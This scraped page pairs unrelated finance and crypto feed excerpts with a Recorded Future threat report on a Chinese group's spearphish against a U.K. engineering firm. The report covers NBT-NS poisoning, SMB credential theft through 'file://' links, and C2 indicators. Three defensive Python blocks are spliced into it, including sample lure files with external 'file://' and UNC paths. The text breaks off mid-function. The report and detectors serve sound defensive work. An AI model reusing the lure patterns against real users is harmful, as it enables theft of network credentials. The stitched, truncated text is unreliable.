Oil Prices Rise Amid U.S. Dollar Correction

By Dmitriy Gurkovskiy, Chief Analyst at RoboForex After being sold for about a month and a half, the oil price is being slightly corrected. It’s still too early to say that it has completely recovered, but little by little investors are starting to pick up the oversold asset. On one hand, these long positions, apart […]

The post Oil Prices Rise Amid U.S. Dollar Correction appeared first on Hacked: Hacking Finance.

Crypto Update: 5 Altcoins to Watch This Week

Last week’s crypto carnage has driven many altcoins below their yearly lows. However, there are some coins that managed to hold their ground. Even amidst massive selloffs, these coins are surviving the storm. Thus, they deserve your attention. In this article, we reveal the 5 altcoins to watch this week. Ripple/Bitcoin (XRP/BTC) While the rest […]

The post Crypto Update: 5 Altcoins to Watch This Week appeared first on Hacked: Hacking Finance.

Tron Price Analysis: TRX/USD Forced to Seek Help from Major Demand Area Despite New Developments

TRX/USD under heavy downside pressure, dropping double digits. That is 13 consecutive sessions of losses. The price is within a known chunky buying area and a failure to attract the bulls could be catastrophic. TRX/USD took a heavy beating on Monday, down as much as 12% in early part of the session. This downside pressure […]

The post Tron Price Analysis: TRX/USD Forced to Seek Help from Major Demand Area Despite New Developments appeared first on Hacked: Hacking Finance.

5 Things To Watch Next Week + ChartBook

Brexit Saga Nearing Its End? GBP/USD, 4-Hour Chart Analysis The Great British Pound had its most volatile week since the Brexit referendum, with still the same issue causing turmoil years after the initial shocking decision. For now, nothing is certain about the outcome of the saga, even with several deadlines quickly approaching. After the exodus […]

The post 5 Things To Watch Next Week + ChartBook appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM/USD Pullback Means Bulls Can Run Free

XLM/USD has seen the required retest of the broken pennant pattern, leaving the door open to greater upside. Technically the price developments appear to be stacked in the favor of the bulls. Recent Price Developments Stellar’s XLM is on its way back up to the north. XLM/USD is running at two consecutive sessions in the […]

The post Stellar Price Analysis: XLM/USD Pullback Means Bulls Can Run Free appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: ETH/USD Has Big Opportunity to Fly Again

ETH/USD is running at seven consecutive sessions of losses, dropping as much as 25%. Price action is moving within a strong demand area, which could very well see the price rocketing again. Current Price Action ETH/USD is stuck within a stubborn downward trend. The price is running at a seven consecutive session losing streak. […]

The post Ethereum Price Analysis: ETH/USD Has Big Opportunity to Fly Again appeared first on Hacked: Hacking Finance.

Bitcoin Update: Bull and Bear Scenarios

To say that the last two days in crypto have been a bloodbath would be an understatement. Many altcoins have broken critical support areas. Some cryptos even registered new yearly lows. One of those is Bitcoin (BTC/USD). Bitcoin dropped to as low as $5,188 on Coinbase and lost as much as 20% of its value […]

The post Bitcoin Update: Bull and Bear Scenarios appeared first on Hacked: Hacking Finance.

Pre-Market Analysis And Chartbook: Dollar Dips on Dovish Powell as Brexit Deal Still in Question

Friday Market Snapshot

Asset | Current Value | Daily Change
S&P 500 | 2,711 | -0.83%
DAX 30 | 11,265 | -0.78%
WTI Crude Oil | 57.59 | 1.80%
GOLD | 1,221 | 0.66%
Bitcoin | 5,555 | -0.53%
EUR/USD | 1.1380 | 0.50%

Today is shaping up to be another wild ride in financial markets after the recent volatile sessions, with currencies, bonds, and equities all experiencing heavy […]

The post Pre-Market Analysis And Chartbook: Dollar Dips on Dovish Powell as Brexit Deal Still in Question appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Consolidate After Key Breakdown

The cryptocurrency segment is still under the influence of this week’s key technical breakdown that carried several majors below crucial support levels. Bitcoin’s moves have been dominating the market in recent days, and as the most valuable coin formed a short-term bottom, the top coins entered a choppy consolidation phase, retracing some of their steep […]

The post Crypto Update: Coins Consolidate After Key Breakdown appeared first on Hacked: Hacking Finance.

Zcash Price Analysis: $100 Bargain Buying

ZEC/USD is running at four consecutive daily sessions closing in the red. Chunky buying interest looks healthy within the $100 price region. ZEC/USD is currently stuck within a very stubborn bearish trend, as seen across the wider crypto market. Several key areas have been breached; however, the ZEC/USD bulls are heavily defending vital support […]

The post Zcash Price Analysis: $100 Bargain Buying appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: LTC/USD Has Fallen Through Vital Support; Where Next?

Critical support for LTC/USD was breached just under the $50 area, leaving the door open to further downside pressure. LTC/USD is moving within a range/consolidation block, subject to another explosive move. LTC/USD has remained firmly within a downside trend, showing no signs of that shifting anytime soon. Out of the last ten sessions, LTC/USD […]

The post Litecoin Price Analysis: LTC/USD Has Fallen Through Vital Support; Where Next? appeared first on Hacked: Hacking Finance.

TRON Price Analysis: TRX/USD Moves Within Proven Buying Area

TRX/USD is flirting with a huge buying area, historically proven to see buyers swoop in. Justin Sun sings the praises of the 100 million $TRX trading volume on the Tron DEX. TRX/USD has been suffering heavily, in line with a large bearish reversal seen across the board. The price is running sharply lower, closing on the daily in […]

The post TRON Price Analysis: TRX/USD Moves Within Proven Buying Area appeared first on Hacked: Hacking Finance.

Pre-Market Analysis And Chartbook: Brexit Chaos Sparks Turmoil Across Markets

Thursday Market Snapshot

Asset | Current Value | Daily Change
S&P 500 | 2,685 | -0.63%
DAX 30 | 11,360 | -0.47%
WTI Crude Oil | 56.40 | 0.71%
GOLD | 1,215 | 0.31%
Bitcoin | 5,389 | -3.72%
EUR/USD | 1.1302 | -0.04%

The Brexit process continues to be the main driver in financial markets across asset classes, and the situation in the UK could be best described […]

The post Pre-Market Analysis And Chartbook: Brexit Chaos Sparks Turmoil Across Markets appeared first on Hacked: Hacking Finance.

Long-Term Cryptocurrency Analysis: Bear Market Continues With Major Technical Breakdown

After months of choppy consolidation, yesterday, we saw the largest move in the cryptocurrency segment since April, which took the majors below key technical levels. Bitcoin’s drop is the most important event, since the most valuable coin violated a structurally important base support for the first time since its historic bull run to $20,000 started. […]

The post Long-Term Cryptocurrency Analysis: Bear Market Continues With Major Technical Breakdown appeared first on Hacked: Hacking Finance.

Chinese Threat Actor TEMP.Periscope Targets UK-Based Engineering Company Using Russian APT Techniques

Insikt Group


Scope Note: Recorded Future’s Insikt Group analyzed network indicators of compromise and TTPs relating to an intrusion incident targeting a U.K.-based engineering company. Sources include Recorded Future’s product, VirusTotal, ReversingLabs, DomainTools Iris, and PassiveTotal, along with third-party metadata and common OSINT techniques.

This report will be of greatest interest to organizations within the high-tech engineering industries in the U.S., Europe, and Japan, as well as those investigating Chinese state-sponsored cyberespionage.

Executive Summary

Employees of a U.K.-based engineering company were among the targeted victims of a spearphishing campaign in early July 2018. The campaign also targeted an email address possibly belonging to a freelance journalist based in Cambodia who covers Cambodian politics, human rights, and Chinese development. We believe both attacks used the same infrastructure as a reported campaign by Chinese threat actor TEMP.Periscope (also known as Leviathan), which targeted Cambodian entities in the run-up to their July 2018 elections. Crucially, TEMP.Periscope’s interest in the U.K. engineering company they targeted dates back to attempted intrusions in May 2017.

Based on the available data and evidence outlined in this report, Recorded Future assesses with medium confidence that Chinese threat actor TEMP.Periscope reused publicly reported, sophisticated TTPs from Russian threat groups Dragonfly and APT28 to target the U.K. engineering company, likely to gain access to sensitive and proprietary technologies and data. We believe TEMP.Periscope reused published TTPs either to increase the group’s chances of success in gaining access to the victim network or to evade attribution by laying false flags to confuse researchers.

Recorded Future Timeline of TTP Activity

Timeline of selected APT28, Dragonfly, and TEMP.Periscope TTP disclosures and activity.

Key Judgments

Background

TEMP.Periscope is a state-sponsored Chinese threat actor that first came to public prominence in October 2017, when reports surfaced about a group called Leviathan. Leviathan used a combination of unique and open source tooling to target the maritime and defense industries for espionage purposes. The report detailed coverage of the group dating back to at least 2014.

Reporting emerged months later highlighting further activity against the maritime and defense sectors that mainly targeted companies in the U.S. and Europe and included more details on the group’s TTPs. The activity was tagged with a new threat actor name, TEMP.Periscope, but the report authors noted that Leviathan and TEMP.Periscope were the same group.

The increased targeting of high-tech marine engineering entities coincided with the growing regional tensions surrounding China’s claims for much of the South China Sea (SCS) territory. Chinese cyberespionage targeting countries neighboring the South China Sea continued to escalate in 2018, with reports of TEMP.Periscope targeting Cambodia ahead of their July 2018 elections. Additionally, attacks such as the one uncovered against a U.S. Navy contractor in early 2018, resulting in the theft of a massive amount of highly sensitive data that included plans to develop a submarine-based, supersonic anti-ship missile, demonstrate China’s continued targeting of cutting-edge naval technology to bridge the technological gap with the U.S.

Threat Analysis

The Infection Vector

The attempted intrusion we studied targeted the network of a U.K. company that provides specialist engineering solutions. The U.K. engineering company shared details of the attempted spearphish with Recorded Future, and the following IOCs served as a starting point for our investigation.

IOCs

Email headers revealed that the spearphish was sent on July 6, 2018 at 9:30 AM UTC, via Foxmail. Foxmail is a freeware email client developed by Tencent, one of the three largest internet services companies in China. Foxmail boasts over three million daily users in China and has previously been associated with Chinese APT activity.

In addition to email addresses belonging to the U.K. engineering company’s employees, the same spearphish was also sent to an email address possibly belonging to a journalist based in Cambodia. The sender account, melissa.coade[at]yahoo[.]com, was spoofing Australian journalist and lawyer Melissa Coade, who among other things writes about Cambodian civil and social matters and has written for the Phnom Penh Post.

In a spearphishing campaign targeting the Cambodian elections in July 2018, Chinese threat actor TEMP.Periscope spoofed the sender address and impersonated a worker from a Cambodian nongovernmental organization (NGO).

Spearphish Email

Snippet of a spearphish email shared by the targeted U.K. engineering company.

The email contained two malicious links. The first, a “file://” link, if clicked, would generate an SMB session. The second link was to a .url file that was also configured to create an outbound SMB connection.

The threat actor masqueraded as a Cambodian reporter requesting further information from the victim to be uploaded to her “report website.” However, spelling and punctuation errors in the message alerted network defenders at the victim organization.

Our analysis of the metadata contained within the email header and a subsequent controlled interaction with the file share over SMB revealed several interesting characteristics of the attempted intrusion.

Responder: The “NetBIOS Poisoner”

First, we analyzed the SMB file path link. We observed the hostname WIN-PRH492RQAFV on C2 82.118.242[.]243 when it attempted to acquire SMB credentials from the victim network. We then noted the hostname WIN-PRH492RQAFV was hardcoded within several forked versions of a Python hacktool called Responder on GitHub. One version of Responder with this hostname was found in a build of P4wnP1 [1] that was uploaded to BeeBin, a free file upload service, and another version with the same hostname was found within PiBunny.

GitHub String

WIN-PRH492RQAFV string present within a modified version of Responder on GitHub.

Responder was released in January 2014. It is described as follows in its README file listed on the official GitHub repository: “Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB. The concept behind this is to target our answers, and be stealthier on the network …”

Malicious use of Responder was first publicly documented on August 11, 2017 as being used by APT28, also known as Fancy Bear. The tool was used against hotel visitors to spoof NetBios resources. Victims were coerced into connecting to UDP port 137 and disclosing credentials over SMB to APT28, which the threat actor then used to gain elevated access to the network.
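A defender's counterpart to the behaviour described above, added here as an example and not part of the Recorded Future report: it broadcasts an NBT-NS name query for a random name that no host owns and reports anyone who answers positively, which is exactly what a poisoner such as Responder does. The packet layout follows RFC 1002; the honeyname prefix and the two-second timeout are choices of this example.

```python
import random
import socket
import string
import struct

NBNS_PORT = 137            # NBT-NS: the UDP port the report says victims were coerced into using
FILE_SERVER_SUFFIX = 0x20  # NetBIOS suffix for the File Server Service, the only one Responder answers by default


def encode_netbios_name(name, suffix=FILE_SERVER_SUFFIX):
    """First-level encoding (RFC 1001 s.14.1): pad the name to 15 bytes, append the
    suffix byte, then emit each nibble as a letter in 'A'..'P'."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    out = bytearray()
    for b in raw:
        out.append(ord("A") + (b >> 4))
        out.append(ord("A") + (b & 0x0F))
    return bytes(out)


def decode_netbios_name(encoded):
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    raw = bytes(((encoded[i] - ord("A")) << 4) | (encoded[i + 1] - ord("A"))
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_name_query(name, txid):
    """NAME QUERY REQUEST (RFC 1002 s.4.2.12) with the broadcast flag set."""
    flags = 0x0110  # R=0, OPCODE=query, RD=1, B=1
    header = struct.pack(">HHHHHH", txid, flags, 1, 0, 0, 0)
    question = b"\x20" + encode_netbios_name(name) + b"\x00"
    question += struct.pack(">HH", 0x0020, 0x0001)  # QTYPE=NB, QCLASS=IN
    return header + question


def parse_positive_response(data, txid):
    """Return the IPv4 addresses claimed in a POSITIVE NAME QUERY RESPONSE that
    matches txid, or None for anything else (negative answers, unrelated traffic)."""
    if len(data) < 12:
        return None
    r_txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    is_response = bool(flags & 0x8000)
    opcode, rcode = (flags >> 11) & 0xF, flags & 0xF
    if r_txid != txid or not is_response or opcode != 0 or rcode != 0 or an < 1:
        return None
    pos = 12                      # responses carry no question section
    if len(data) < pos + 44 or data[pos] != 0x20:
        return None
    pos += 1 + 32 + 1             # length byte, 32 encoded chars, terminator
    _rtype, _rclass, _ttl, rdlength = struct.unpack(">HHIH", data[pos:pos + 10])
    pos += 10
    # RDATA is a list of (NB_FLAGS, NB_ADDRESS) entries, 6 bytes each.
    return [socket.inet_ntoa(data[o + 2:o + 6]) for o in range(pos, pos + rdlength, 6)]


def build_positive_response(name, txid, ip):
    """Constructed sample of a poisoner's answer, used only for offline self-test."""
    header = struct.pack(">HHHHHH", txid, 0x8500, 0, 1, 0, 0)  # R=1, AA=1, RD=1, RCODE=0
    rdata = struct.pack(">H", 0x0000) + socket.inet_aton(ip)     # B-node, unique name
    rr = b"\x20" + encode_netbios_name(name) + b"\x00"
    rr += struct.pack(">HHIH", 0x0020, 0x0001, 165, len(rdata)) + rdata
    return header + rr


def probe_for_poisoner(timeout=2.0):
    """Broadcast a query for a name nobody legitimately owns. Every host that answers
    positively is behaving like Responder; returns [(src_ip, name, claimed_ips)]."""
    bogus = "HN" + "".join(random.choices(string.ascii_uppercase + string.digits, k=10))
    txid = random.randint(0, 0xFFFF)
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.settimeout(timeout)
        s.sendto(build_name_query(bogus, txid), ("255.255.255.255", NBNS_PORT))
        try:
            while True:
                data, (src, _port) = s.recvfrom(1024)
                claimed = parse_positive_response(data, txid)
                if claimed is not None:
                    hits.append((src, bogus, claimed))
        except socket.timeout:
            pass
    return hits


if __name__ == "__main__":
    for src, name, claimed in probe_for_poisoner():
        print(f"NBT-NS poisoner suspected: {src} answered for bogus name {name} with {claimed}")
```

Run it periodically from a host on each broadcast domain; a legitimate network never answers for a name that was just invented.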

More Lessons From Russia: SMB Credential Harvesting Using “file://” Path

Building on the use of Responder, the threat actor also appeared to borrow techniques originating from a different Russian threat actor, Dragonfly, also known as Energetic Bear or Crouching Yeti.

The path “file://82.118.242[.]243/[REDACTED]” used in the spearphish was likely to steal SMB credentials by creating an invisible image tag that the host attempts to fetch over SMB, while giving the attackers a hashed value of the user’s NTLM password. When executing the code, the browser creates an invisible image tag and sets the URL to an attack server using the “file://” protocol scheme, which also transmits the user’s login NTLM hash. This created an effective watering hole to fingerprint potential victims and gather credentials for subsequent incursions into target networks.

This technique of leveraging the “file://” path to trigger an SMB connection was first publicly detailed by US-CERT on March 15, 2018 as a sophisticated technique used by Russian government actors believed to be the Dragonfly threat actor, targeting the energy industry and other critical infrastructure sectors.
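As an added example (not code from the report), a scanner for the two lure shapes described above: a file:// link or invisible image in the message body, and a .url attachment whose fields point at an SMB share. The sample message and .url attachment are constructed, with 203.0.113.0/24 documentation space standing in for the attacker's public address; treating a UNC IconFile in a .url shortcut as the SMB trigger is this example's assumption about how such shortcuts are configured.

```python
import ipaddress
import re
from configparser import ConfigParser

# Address space an SMB connection may legitimately reach; anything else is "external".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# href/src attributes whose target uses the file:// scheme, including the invisible-image variant.
FILE_LINK_RE = re.compile(r"""(?:href|src)\s*=\s*["']?\s*(file://[^"'\s>]+)""", re.IGNORECASE)
UNC_RE = re.compile(r"^\\\\([A-Za-z0-9.\-]+)\\")

# Constructed sample body modelled on the lure in the report (a "report website" to upload to).
SAMPLE_BODY = """<html><body>
<p>Please upload the requested documents to my report website:</p>
<a href="file://203.0.113.45/report/upload">report website</a>
<p>Or use the attached shortcut.</p>
<img src="file://203.0.113.45/img/logo.png" width="1" height="1">
<a href="https://example.org/news">news</a>
</body></html>"""

# Constructed .url (Internet Shortcut) attachment. Assumption: a UNC IconFile is fetched over
# SMB when Explorer renders the icon, which is how a shortcut forces an outbound SMB connection.
SAMPLE_URL_FILE = r"""[InternetShortcut]
URL=file://203.0.113.45/report/upload
IconFile=\\203.0.113.45\share\icon.ico
IconIndex=1
"""


def smb_host_from_target(target):
    """Return the host a file:// URL or UNC path would make the client contact over SMB,
    or None when the target is local (file:///C:/...) or not an SMB reference."""
    t = target.strip()
    if t.lower().startswith("file://"):
        host = t[7:].lstrip("/").replace("\\", "/").split("/", 1)[0]
        return host if host and ":" not in host else None
    m = UNC_RE.match(t)
    return m.group(1) if m else None


def is_external(host):
    """Public IPs are external; hostnames with a dot are treated as external too,
    since a bare NetBIOS name cannot leave the local broadcast domain."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." in host
    return not any(ip in net for net in INTERNAL_NETS)


def scan_html_body(body):
    """Findings as (kind, raw_target, host) for file:// links that reach external hosts."""
    findings = []
    for url in FILE_LINK_RE.findall(body):
        host = smb_host_from_target(url)
        if host and is_external(host):
            findings.append(("html_file_link", url, host))
    return findings


def scan_url_attachment(text):
    """Parse a .url attachment and flag fields that resolve to an external SMB host."""
    cp = ConfigParser(interpolation=None)
    cp.read_string(text)
    findings = []
    if cp.has_section("InternetShortcut"):
        for key in ("URL", "IconFile", "WorkingDirectory"):
            value = cp["InternetShortcut"].get(key)
            host = smb_host_from_target(value) if value else None
            if host and is_external(host):
                findings.append(("url_attachment_" + key.lower(), value, host))
    return findings


def scan_message(body, url_attachments=()):
    """Scan a message body plus any .url attachments; returns all findings."""
    findings = scan_html_body(body)
    for text in url_attachments:
        findings.extend(scan_url_attachment(text))
    return findings


if __name__ == "__main__":
    for kind, target, host in scan_message(SAMPLE_BODY, [SAMPLE_URL_FILE]):
        print(f"{kind}: {target} -> outbound SMB to {host}")
```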

SWC Hosted On 82.118.242[.]243?

Registration details for 82.118.242[.]243, the IP associated with the SMB credential theft detailed above, proved to be inconclusive. WHOIS referenced the IP within a massive range registered to the U.K. ISP Virgin Media (82.0.0.0 – 82.47.255.255). However, MaxMind resolved the IP to Bulgarian hosting provider Histate Global Corp.

Based on the listed vulnerabilities in Shodan and scan results for the machine, 82.118.242[.]242 is a web server likely running Windows Internet Information Services (IIS) 7.5. It has ports 22, 80, 88, 443, 445, 587, 902, and 5985 open.

Vulnerabilities

Vulnerabilities likely associated with 82.118.242[.]243.

Another IP address that falls within the same /24 CIDR range, 82.118.242[.]124, was flagged in Recorded Future with an abnormally high risk score of 89 in July 2018. This was due to the IP appearing in the IOC listing by Cisco Talos as second-stage malware associated with the VPNFilter botnet. This botnet has been attributed to APT28 by the U.S. Department of Justice.

Based on the vulnerability of the web server 82.118.242[.]243 and the use of the “file://” SMB credential stealing technique directing the victim to the IP, we believe the threat actor compromised the web server and used it as a targeted watering hole to illicitly acquire SMB credentials from victims during this campaign.

WIN-AB2I27TG6FK and Chinese Threat Actor TEMP.Periscope

Hostname WIN-AB2I27TG6FK was observed as the NetBios server name of the device sending the spearphish from the VPN IP 193.180.255[.]2.

Open source research for the hostname WIN-AB2I27TG6FK revealed an open directory (Google cached link) at the URL scsnewstoday[.]com/news/ that hosted several files containing the hostname in the filename (see snapshot of the domain below). The domain was previously reported as a C2 used by the Chinese threat actor TEMP.Periscope to deliver their AIRBREAK downloader. AIRBREAK, also known as Orz, is a JavaScript-based backdoor that retrieves commands from hidden strings in compromised webpages and actor-controlled profiles on legitimate services.

File Listing

File listing on an open directory hosted at http://scsnewstoday[.]com/news.

In addition to AIRBREAK, the scsnewstoday C2 server reportedly hosted other malware and logs relating to TEMP.Periscope malicious activity that targeted Cambodian entities in the run-up to the country’s elections. The spearphish against the U.K. engineering company occurred at the same time this campaign was active — in early July 2018. Judging from the naming convention employed on filenames in the open directory, C2S and S2C likely relate to client-to-server and server-to-client connections with the hostname WIN-AB2I27TG6FK, which we assess is likely to be the hostname associated with the scsnewstoday[.]com C2. We’d expect to see many more files listed if the hostnames in the filenames related to the clients, or victims, targeted by TEMP.Periscope.

The domain scsnewstoday[.]com was hosted on U.S. IP 68.65.123[.]230 and registered to domain hosting service Namecheap until July 11, 2018. Details of the C2 domain were published just a day earlier, which we believe may have unnerved TEMP.Periscope operators, resulting in it being dropped. Unfortunately, the open directory is no longer accessible, which hampered our ability to understand the precise nature of the three files containing the WIN-AB2I27TG6FK hostname.

According to industry reporting, Chinese espionage group TEMP.Periscope has conducted large-scale phishing, intrusion, remote access trojan (RAT), and data exfiltration activity since at least 2013. Targeting has primarily focused on maritime-related entities across multiple industries, including engineering, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional and consulting services, high-tech industry, healthcare, and media and publishing.

Originating IP for Spearphish 193.180.255[.]2

This IP appeared in the email header information as the X-Forwarded-For IP, indicating that it was the originating IP address for the sender of the spearphish. WHOIS registration data revealed that 193.180.255[.]2 is registered to Privat Kommunikation Sverige AB, which is the full company name of PrivateVPN, a popular commercial VPN service. The company states that they support OpenVPN over TCP/UDP, L2TP, IPSEC, PPTP, and IKEv2 protocols.

Recorded Future identified three VPN connections involving the 193.180.255[.]2 IP between June 30 and July 1, 2018. All three connections were over UDP 500 (IKE/IKEv2), originating from Bangladesh IP 103.198.138[.]187.

Additionally, between July 3 and July 10, 2018, 193.180.255[.]2 established SSH (TCP 22), NetBios (TCP 139), and Microsoft SMB (TCP 445) connections to the malicious SMB credential harvesting C2 82.118.242[.]243. Interestingly, these connections took place during the seven-day window within which the spearphish was sent.

Historic Targeting of U.K. Engineering Company by TEMP.Periscope

Prior to this attempt in July, the same U.K. engineering company had previously been targeted in May 2017. This campaign used the ETERNALBLUE exploit and a unique DNS tunneler backdoor. The DNS tunneler used in the attack was configured to communicate with a subdomain of thyssenkrupp-marinesystems[.]org. The domain was clearly spoofing German defense contractor ThyssenKrupp Marine Systems, which specializes in marine engineering. In addition to hosting the spoofed domain, Netherlands-based HostSailor VPS IP 185.106.120[.]206 also hosted an open directory containing malware and tools for use by the threat actor, not dissimilar to the TEMP.Periscope scsnewstoday[.]com C2 and open directory setup.

Recorded Future analysis on the spoofed domain revealed that this server hosted the SeDll Javascript loader SHA256: 146aa9a0ec013aa5bdba9ea9d29f59d48d43bc17c6a20b74bb8c521dbb5bc6f4, which had been used in August 2017 by Leviathan (also known as TEMP.Periscope) to execute another Javascript backdoor, AIRBREAK. Crucially, the first mention of Leviathan as a Chinese threat actor occurred in October 2017, meaning TEMP.Periscope was using the same infrastructure to target the U.K. engineering company six months earlier.

In November 2017, another spearphish leveraging Microsoft Equation Editor vulnerability CVE-2017-11882 was sent to the U.K. engineering company. This attack delivered a Cobalt Strike payload.

Conclusions and Outlook

The attempted spearphish has revealed a suite of TTPs that are linked to the recent activities of several different threat actors: APT28, Dragonfly, and TEMP.Periscope. We have listed the key TTPs observed in this attack in a chronological format in order to draw attention to the likelihood of techniques being copied from publicly disclosed reporting of these TTPs. These are summarized in the table below:

Observed TTPs

Summary of observed TTPs used in attacks and links to similar APT TTPs.

Given that most of the listed APT28, Dragonfly, and TEMP.Periscope TTPs have already been published, we believe there are three likely scenarios for the activity observed:

  1. A Russian threat actor was responsible and borrowed TEMP.Periscope TTPs.
  2. TEMP.Periscope was responsible and borrowed Russian threat actor TTPs.
  3. Another threat actor was responsible that used TTPs from the Russian groups and TEMP.Periscope.

In order to assess which of the three hypotheses above best explains our observations, we assessed the accumulated evidence detailed in this report.

First, we are certain that the attacker used IP 193.180.255[.]2 as a VPN endpoint to send the spearphish because the IP address resolves to Swedish VPN service PrivateVPN. We are also certain that the device that sent the spearphish was associated with the WIN-AB2I27TG6FK hostname. Further, we can state that this hostname was used in the filename of several files hosted on a known TEMP.Periscope C2, which had an open directory. As outlined earlier in this report, we believe the sender of the spearphish, WIN-AB2I27TG6FK, is probably the hostname of the TEMP.Periscope open directory hosted at scsnewstoday[.]com.

The spearphish was sent on July 6, 2018. Just a few days later, FireEye reported on a TEMP.Periscope campaign targeting the Cambodian elections in July 2018 that used the open directory hosted on scsnewstoday[.]com as a C2. The report noted that the same infrastructure was likely active since at least April 2017.

Secondly, the “file://” path included in the spearphish linking to the C2 82.118.242[.]243 was designed to steal credentials over SMB. This technique was documented publicly as a Dragonfly threat actor TTP by the US-CERT in March 2018, almost four months before the observed attack.

The observed hostname on the 82.118.242[.]243 IP was WIN-PRH492RQAFV, which we found was hard coded in a forked Responder script on GitHub. The original Responder script has previously been used by another Russian threat actor, APT28, according to reporting published in August 2017.

Recorded Future Timeline of TTP Activity

Timeline of selected APT28, Dragonfly, and TEMP.Periscope TTP disclosures and activity.

TEMP.Periscope has been actively followed by the research community since at least October 2017 — two months after APT28’s use of Responder was disclosed by FireEye in August 2017 [2]. There has since been a flurry of reporting on TEMP.Periscope activity in 2018, with campaigns against American and European maritime engineering companies and the Cambodian government. We should note here that the spearphish we observed was also sent to an email account that contained the name of a journalist based in Cambodia and was sent from an account spoofing an Australian journalist that had previously reported on Cambodian topics.

Therefore, it is plausible that, with the timeline of Russian tooling being made public prior to the disclosure of the TEMP.Periscope campaigns, TEMP.Periscope adapted their TTPs to either hinder attribution efforts or to simply use techniques that they deemed would be effective.

The overlap in infrastructure with the scsnewstoday[.]com C2 domain is also key; the domain was publicly reported by FireEye as being used by TEMP.Periscope only a few days after the spearphish to the U.K. engineering company was sent, making it highly unlikely that another threat actor could have compromised the C2. Additionally, the longer-term targeting of the U.K. engineering company by TEMP.Periscope since at least May 2017 highlights the group’s persistence in attempting to gain access.

Based on the available data and evidence outlined in this report, Recorded Future assesses with medium confidence that Chinese threat actor TEMP.Periscope reused TTPs from other threat groups to target the U.K. engineering company, likely to gain access to their sensitive and proprietary technologies and data. TEMP.Periscope has demonstrated an ability to rapidly adapt its TTPs to learn from other groups, such as APT28 and Dragonfly, either to increase their chances of success in gaining access to the victim network or to obfuscate attribution attempts.

Recorded Future expects TEMP.Periscope to continue to target organizations in the high-tech defense and engineering sectors. The Chinese strategic requirement to develop advanced technology, particularly in marine engineering, remains an intense focus as China looks to dominate the South China Sea territory. We believe TEMP.Periscope will continue to use commodity malware because it is still broadly successful and relatively low cost for them to use. They will continue to observe “trending” vulnerabilities to exploit and use techniques that have been publicly reported in order to gain access to victim networks.

Finally, Recorded Future believes that threat actors are actively emulating each other, monitoring publications and data sources both to protect their infrastructure and to observe techniques that rival actors are using. We anticipate that adversaries will continue to plant false flags, either via technical means (as observed in the Olympic Destroyer campaign) or with technique emulation. As means of detection have drastically improved, the public identification of code overlap and the mapping of TTPs plays into the hands of well-coordinated operations, which can now make attribution findings murky at best. The samples and techniques named in a report can now rapidly be transposed into new or ongoing campaigns due to the volume of public reporting on these issues. This muddying of the waters allows targeted campaigns to better blend in with the noise, attempting to blur the lines between adversary groups.

Network Defense Recommendations

Recorded Future recommends organizations conduct the following measures when defending against TEMP.Periscope’s attempts to steal credentials to gain network access:

  • Configure your intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defense mechanisms in place to alert on — and upon review, consider blocking illicit connection attempts from — the external IP addresses and domains listed in Appendix A.
  • Include the provided Snort rules in Appendix B in IDS and IPS appliances to detect attempted SMB credential stealing. Also, if applicable, use the provided Bro queries in Appendix B to hunt for signs of TEMP.Periscope TTPs detailed in this report on your network.
  • Use Recorded Future’s API to import indicators listed in this report (Appendix A) into your endpoint detection and response (EDR) platform.
  • Configure endpoint detection and response traffic to alert and block connections to indicators in Appendix A.
  • Utilize the provided Yara rule in Appendix C to search your network for evidence of the spearphish being sent to your organization.
  • Monitor and restrict SMB traffic across your network, particularly external attempts to authenticate via SMB.
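The last recommendation above, turned into a hunt over connection logs as an added example (not the report's Bro queries or Snort rules): it flags SMB and NetBIOS connections from internal hosts to external addresses and raises severity when the destination is the credential-harvesting IP named in this report. The conn.log sample is constructed in Zeek's column layout; 203.0.113.0/24 is documentation space standing in for other public hosts.

```python
import ipaddress
from collections import defaultdict

# Ports the report's technique touches: NBT-NS (UDP 137), NetBIOS session (TCP 139), SMB (TCP 445).
SMB_PORTS = {("udp", 137), ("tcp", 139), ("tcp", 445)}

# The SMB credential-harvesting host named in this report (defanged there as 82.118.242[.]243).
REPORT_SMB_IOCS = {"82.118.242.243"}

INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed sample in Zeek conn.log style (tab-separated, header first). The internal
# file server 10.20.0.5 is normal traffic; the external SMB destinations are not.
SAMPLE_CONN_LOG = """ts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto
1530869400.10\t10.20.1.17\t49731\t10.20.0.5\t445\ttcp
1530869401.42\t10.20.1.17\t49732\t82.118.242.243\t445\ttcp
1530869401.45\t10.20.1.17\t137\t82.118.242.243\t137\tudp
1530869410.00\t10.20.1.23\t49801\t203.0.113.77\t139\ttcp
1530869412.00\t10.20.1.23\t52001\t203.0.113.9\t443\ttcp
"""


def is_external(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return not any(ip in net for net in INTERNAL_NETS)


def parse_conn_log(text):
    """Yield one dict per record of a header-first TSV connection log."""
    lines = [l for l in text.splitlines() if l.strip()]
    fields = lines[0].split("\t")
    for line in lines[1:]:
        yield dict(zip(fields, line.split("\t")))


def find_external_smb(records):
    """Alerts for SMB/NetBIOS connections from internal hosts to external ones.
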